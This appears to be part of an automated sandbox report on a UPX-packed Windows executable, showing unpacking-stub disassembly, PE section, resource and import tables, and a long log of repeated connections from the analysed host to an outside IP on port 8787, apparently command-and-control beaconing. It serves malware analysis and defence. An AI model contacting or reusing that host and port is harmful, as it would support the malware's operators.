                                  jne 00007F93651125A9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  jmp 00007F9365112576h
                                  add ebx, ebx
                                  jne 00007F93651125A9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  jmp 00007F93651125F4h
                                  xor ecx, ecx
                                  sub eax, 03h
                                  jc 00007F93651125B3h
                                  shl eax, 08h
                                  mov al, byte ptr [esi]
                                  inc esi
                                  xor eax, FFFFFFFFh
                                  je 00007F9365112617h
                                  sar eax, 1
                                  mov ebp, eax
                                  jmp 00007F93651125ADh
                                  add ebx, ebx
                                  jne 00007F93651125A9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F936511256Eh
                                  inc ecx
                                  add ebx, ebx
                                  jne 00007F93651125A9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F9365112560h
                                  add ebx, ebx
                                  jne 00007F93651125A9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  add ebx, ebx
                                  jnc 00007F9365112591h
                                  jne 00007F93651125ABh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jnc 00007F9365112586h
                                  add ecx, 02h
                                  cmp ebp, FFFFFB00h
                                  adc ecx, 02h
                                  lea edx, dword ptr [edi+ebp]
                                  cmp ebp, FFFFFFFCh
                                  jbe 00007F93651125B0h
                                  mov al, byte ptr [edx]
                                  Programming Language:
                                  • [ASM] VS2013 build 21005
                                  • [ C ] VS2013 build 21005
                                  • [C++] VS2013 build 21005
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ASM] VS2013 UPD4 build 31101
                                  • [RES] VS2013 build 21005
                                  • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1dbcf0 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x15a000 | 0x81cf0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1dc114 | 0xc | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x159c34 | 0x48 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x103000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x104000 | 0x56000 | 0x55e00 | 2571fa5ea53c45ae1cc31e27c28ac18d | False | 0.9871270014556041 | data | 7.935470490154811 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x15a000 | 0x83000 | 0x82200 | a4da39dbe4592de5fc21c4317176cba9 | False | 0.960808042146974 | data | 7.959535071153083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x15a5ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x15a6d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x15a804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x15a930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0x15ac1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0x15ad48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0x15bbf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0x15c4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0x15ca0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0x15efb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0x160064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | empty | English | Great Britain | 0
RT_STRING | 0xcd4f0 | 0x594 | empty | English | Great Britain | 0
RT_STRING | 0xcda84 | 0x68a | empty | English | Great Britain | 0
RT_STRING | 0xce110 | 0x490 | empty | English | Great Britain | 0
RT_STRING | 0xce5a0 | 0x5fc | empty | English | Great Britain | 0
RT_STRING | 0xceb9c | 0x65c | empty | English | Great Britain | 0
RT_STRING | 0xcf1f8 | 0x466 | empty | English | Great Britain | 0
RT_STRING | 0xcf660 | 0x158 | empty | English | Great Britain | 0
RT_RCDATA | 0x1604d0 | 0x7b287 | data |  |  | 1.0003191563172136
RT_GROUP_ICON | 0x1db75c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1db7d8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1db7f0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1db808 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1db820 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1db900 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | GetAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetOpenFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetUseConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | connect
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 09:31:26.408710957 CET | 49730 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:26.528172970 CET | 8787 | 49730 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:26.528354883 CET | 49730 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:26.528944016 CET | 49730 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:26.648148060 CET | 8787 | 49730 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:28.467376947 CET | 8787 | 49730 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:28.467538118 CET | 49730 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:28.467648029 CET | 49730 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:28.587414980 CET | 8787 | 49730 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:29.475307941 CET | 49731 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:29.594912052 CET | 8787 | 49731 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:29.595016003 CET | 49731 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:29.595606089 CET | 49731 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:29.714903116 CET | 8787 | 49731 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:31.530651093 CET | 8787 | 49731 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:31.530822039 CET | 49731 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:31.530921936 CET | 49731 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:31.650335073 CET | 8787 | 49731 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:32.538069010 CET | 49732 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:32.657479048 CET | 8787 | 49732 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:32.657592058 CET | 49732 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:32.658118963 CET | 49732 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:32.777432919 CET | 8787 | 49732 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:34.592327118 CET | 8787 | 49732 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:34.592415094 CET | 49732 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:34.592474937 CET | 49732 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:34.713279963 CET | 8787 | 49732 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:35.605792046 CET | 49733 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:35.725260019 CET | 8787 | 49733 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:35.725771904 CET | 49733 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:35.728229046 CET | 49733 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:35.848681927 CET | 8787 | 49733 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:37.670509100 CET | 8787 | 49733 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:37.670588970 CET | 49733 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:37.670674086 CET | 49733 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:37.790642977 CET | 8787 | 49733 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:38.684047937 CET | 49736 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:38.805792093 CET | 8787 | 49736 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:38.806071997 CET | 49736 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:38.807209969 CET | 49736 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:38.926691055 CET | 8787 | 49736 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:41.098274946 CET | 8787 | 49736 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:41.098332882 CET | 49736 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:41.098407030 CET | 49736 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:41.142117023 CET | 8787 | 49736 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:41.142163992 CET | 49736 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:41.218240976 CET | 8787 | 49736 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:42.100241899 CET | 49740 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:42.470206976 CET | 8787 | 49740 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:42.470371008 CET | 49740 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:42.470921040 CET | 49740 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:42.590168953 CET | 8787 | 49740 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:44.408803940 CET | 8787 | 49740 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:44.408935070 CET | 49740 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:44.409050941 CET | 49740 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:44.528430939 CET | 8787 | 49740 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:45.412977934 CET | 49742 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:45.532253981 CET | 8787 | 49742 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:45.532382011 CET | 49742 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:45.532903910 CET | 49742 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:45.652203083 CET | 8787 | 49742 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:47.487263918 CET | 8787 | 49742 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:47.487371922 CET | 49742 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:47.487426043 CET | 49742 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:47.606797934 CET | 8787 | 49742 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:48.491081953 CET | 49743 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:48.610651016 CET | 8787 | 49743 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:48.610812902 CET | 49743 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:48.611483097 CET | 49743 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:48.730813980 CET | 8787 | 49743 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:50.549973011 CET | 8787 | 49743 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:50.550101995 CET | 49743 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:50.550218105 CET | 49743 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:50.669493914 CET | 8787 | 49743 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:51.553592920 CET | 49744 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:51.673557997 CET | 8787 | 49744 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:51.673717976 CET | 49744 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:51.674578905 CET | 49744 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:51.793994904 CET | 8787 | 49744 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:53.623752117 CET | 8787 | 49744 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:53.623867989 CET | 49744 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:53.623966932 CET | 49744 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:53.743483067 CET | 8787 | 49744 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:54.631829023 CET | 49745 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:54.751193047 CET | 8787 | 49745 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:54.751336098 CET | 49745 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:54.751936913 CET | 49745 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:54.871385098 CET | 8787 | 49745 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:56.687107086 CET | 8787 | 49745 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:56.687236071 CET | 49745 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:56.687336922 CET | 49745 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:56.806765079 CET | 8787 | 49745 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:57.695982933 CET | 49746 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:57.815279961 CET | 8787 | 49746 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:57.815434933 CET | 49746 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:57.815943956 CET | 49746 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:57.935286045 CET | 8787 | 49746 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:59.764508963 CET | 8787 | 49746 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:31:59.764564991 CET | 49746 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:59.764632940 CET | 49746 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:31:59.884322882 CET | 8787 | 49746 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:00.772095919 CET | 49747 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:00.891486883 CET | 8787 | 49747 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:00.891845942 CET | 49747 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:00.892399073 CET | 49747 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:01.011775017 CET | 8787 | 49747 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:02.827013969 CET | 8787 | 49747 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:02.827081919 CET | 49747 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:02.827187061 CET | 49747 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:02.946587086 CET | 8787 | 49747 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:03.834789038 CET | 49748 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:03.954200983 CET | 8787 | 49748 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:03.956127882 CET | 49748 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:03.956617117 CET | 49748 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:04.075918913 CET | 8787 | 49748 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:05.889717102 CET | 8787 | 49748 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:05.889862061 CET | 49748 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:05.889946938 CET | 49748 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:06.010740042 CET | 8787 | 49748 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:06.897221088 CET | 49749 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:07.016556025 CET | 8787 | 49749 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:07.016783953 CET | 49749 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:07.017380953 CET | 49749 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:07.136823893 CET | 8787 | 49749 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:08.953000069 CET | 8787 | 49749 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:08.953176975 CET | 49749 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:08.953295946 CET | 49749 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:09.072618961 CET | 8787 | 49749 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:09.959532976 CET | 49750 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:10.078915119 CET | 8787 | 49750 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:10.079050064 CET | 49750 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:10.079703093 CET | 49750 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:10.199970961 CET | 8787 | 49750 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:12.014738083 CET | 8787 | 49750 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:12.014863014 CET | 49750 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:12.014993906 CET | 49750 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:12.134294033 CET | 8787 | 49750 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:13.022237062 CET | 49751 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:13.141577959 CET | 8787 | 49751 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:13.141746998 CET | 49751 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:13.142324924 CET | 49751 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:13.261663914 CET | 8787 | 49751 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:15.081214905 CET | 8787 | 49751 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:15.081367016 CET | 49751 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:15.081459999 CET | 49751 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:15.200726986 CET | 8787 | 49751 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:16.090046883 CET | 49752 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:16.210218906 CET | 8787 | 49752 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:16.210314989 CET | 49752 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:16.210804939 CET | 49752 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:16.330099106 CET | 8787 | 49752 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:18.212445974 CET | 8787 | 49752 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:18.212512016 CET | 49752 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:18.212596893 CET | 49752 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:18.331799984 CET | 8787 | 49752 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:19.225203991 CET | 49760 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:19.344552040 CET | 8787 | 49760 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:19.344652891 CET | 49760 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:19.345351934 CET | 49760 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:19.465447903 CET | 8787 | 49760 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:21.316139936 CET | 8787 | 49760 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:21.316297054 CET | 49760 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:21.316519976 CET | 49760 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:21.435796022 CET | 8787 | 49760 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:22.319597006 CET | 49766 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:22.518547058 CET | 8787 | 49766 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:22.518675089 CET | 49766 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:22.519260883 CET | 49766 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:22.638487101 CET | 8787 | 49766 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:24.493659019 CET | 8787 | 49766 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:24.493802071 CET | 49766 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:24.493901014 CET | 49766 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:24.613360882 CET | 8787 | 49766 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:25.514667988 CET | 49772 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:25.634012938 CET | 8787 | 49772 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:25.634130001 CET | 49772 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:25.635190964 CET | 49772 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:25.754533052 CET | 8787 | 49772 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:27.562943935 CET | 8787 | 49772 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:27.563097000 CET | 49772 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:27.563230038 CET | 49772 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:27.684879065 CET | 8787 | 49772 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:28.575330973 CET | 49783 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:28.694596052 CET | 8787 | 49783 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:28.694696903 CET | 49783 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:28.695255995 CET | 49783 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:28.814752102 CET | 8787 | 49783 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:30.644603968 CET | 8787 | 49783 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:30.644664049 CET | 49783 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:30.644700050 CET | 49783 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:30.764122963 CET | 8787 | 49783 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:31.647417068 CET | 49789 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:31.768342972 CET | 8787 | 49789 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:31.772139072 CET | 49789 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:31.772488117 CET | 49789 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:31.893503904 CET | 8787 | 49789 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:33.703562975 CET | 8787 | 49789 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:33.703619957 CET | 49789 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:33.703712940 CET | 49789 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:33.822968006 CET | 8787 | 49789 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:34.709608078 CET | 49800 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:34.829042912 CET | 8787 | 49800 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:34.829157114 CET | 49800 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:34.829535007 CET | 49800 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:34.948769093 CET | 8787 | 49800 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:36.769028902 CET | 8787 | 49800 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:36.769151926 CET | 49800 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:36.769232035 CET | 49800 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:36.888555050 CET | 8787 | 49800 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:37.772955894 CET | 49806 | 8787 | 192.168.2.4 | 192.210.150.26
